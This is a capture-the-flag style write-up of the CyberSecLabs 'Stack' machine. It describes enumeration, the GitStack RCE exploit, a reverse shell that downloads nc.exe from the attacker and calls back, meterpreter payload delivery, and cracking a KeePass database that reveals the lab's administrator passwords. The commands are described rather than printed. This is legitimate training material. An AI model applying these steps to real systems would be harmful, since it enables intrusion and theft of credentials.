Stack
https://www.cyberseclabs.co.uk/labs/info/Stack/
Scanning and Enumeration
Nmap
Running an initial Nmap scan with the -A switch produces the following.
Port 445 (SMB)
First up we can check against SMB with null authentication. I was unable to authenticate unfortunately with various tools.
Enum4linux also aborted due to null authentication errors.
Port 80 (HTTP)
Port is open so we can start with Gobuster and Nikto to see what information we can initially pull before physically browsing to the webpage.
The root page takes us to the following when browsing to http://172.31.1.12 in a web browser.
The Firefox extension 'Wappalyzer' confirms the following information regarding the webpage.
Dirb
I did not get results from Gobuster so decided to use a recursive directory enumeration tool. On finding the /web/ directory dirb then found /web/index.php.
After browsing to the directory we come to the following page.
Exploitation
After searching around this I found nothing of interest and dead ends.. We do have a name in the tab of 'GitStack Web'.
After searching on Google we come to the following hosted on exploit-db.com
This is a python script in which all we need to do is change the IP and the command we want to execute. This should hopefully give us remote command execution on the server.
We can run the script and confirm remote code execution with the ipconfig command.
Reverse Shell as user
We should now attempt to gain a proper reverse shell so we can enumerate the server properly.
I started off by opening a Python SimpleHttpServer in a directory that hosts nc.exe.
Then I edited the exploit to download the nc.exe file from my attacking machine.
I then created a netcat listener on my attacking machine in preparation for the next step.
Now we can edit the command in the exploit to call the nc.exe we uploaded back to the listener running on our attacking machine.
After executing the exploit we manage to get a reverse shell and confirm the user we are running as.
Privilege Escalation
I then downloaded winPEAS.exe with certutil.exe from my attacking machine.
After running we can see that we have the 'SeImpersonatePrvilege' set.
I then ran the systeminfo command on the system to check OS version.
As we are running Windows Server 2012 R2 Standard and have the SeImpersonatePrivilege we can more than likely run a juicy / rotten potato attack to escalate our privileges.
I ran the systeminfo command information against Windows-exploit-suggester.py which has reinforced for us that we can likely perform this type of attack for privilege escalation.
I previously covered a JuicyPotato attack on my writeup for HackTheBoxe's Bart. This was covered without metasploit so I will take this opportunity to include the attack with metasploit in a writeup.
First I created a payload for meterpreter with msfvenom.
I then downloaded the payload on to the machine with certutil.exe
I then run the module exploit/multi/handler on Metasploit and set the correct information and set the payload to be the exact same as the one specified in the msfvenom command. I then run the Metasploit module and once the listener was set up and running I then executed the uploaded payload on the server.
I tried multiple times to get the Metasploit module working for JuicyPotato and could not get a valid CLSID to perform the escalation with.
At this point It could take a while to find the correct CLSID to use against this server. I want to explore more attack vectors first.
One of the interesting bits of information I found earlier was a file called 'password_manager.kdbx'.
After performing a Google search the file extension belongs to KeePass which is a password manager. The file appears to be a database file.
After searching for exploits with the KeePass database file I found some blogposts where we can convert the KeePass database file into a hash with a John the Ripeepr module called KeePass2John which we can then attempt to crack.
Since we are already in a meterpreter shell we can just run the download command with the path of the KeePass database to download.
We can then run the keepass2john command on Kali to convert the file to a hash format.
We can then check John for available formats.
We can then run John against the has with the --format=KeePass switch.
Now that John has cracked the password of 'princess' we can now install KeePass2 and see if we can open the database file with the password we have cracked.
Once downloaded open Keepass2 and load the database file. You will then be presented with a credentials screen to open the database.
We can then open the Administrators profile and view the stored password.
John's password:
We now have credentials to the following:
Administrator:secur3_apass262
John:whLd49NnsDWRJ7KW
I actually tried cracking the NTLMv2 hash for the John account much earlier on before I noticed a KeePass file on the system. I captured it by setting up a SMB server on my attacking machine and getting the user account to authenticate against it. Makes sense I could not crack it when the password is that strong.
Since RDP is open I connected as the Administrator account and was successful.
We can also log in with Evil-WinRM as port 5985 is open.
Last updated
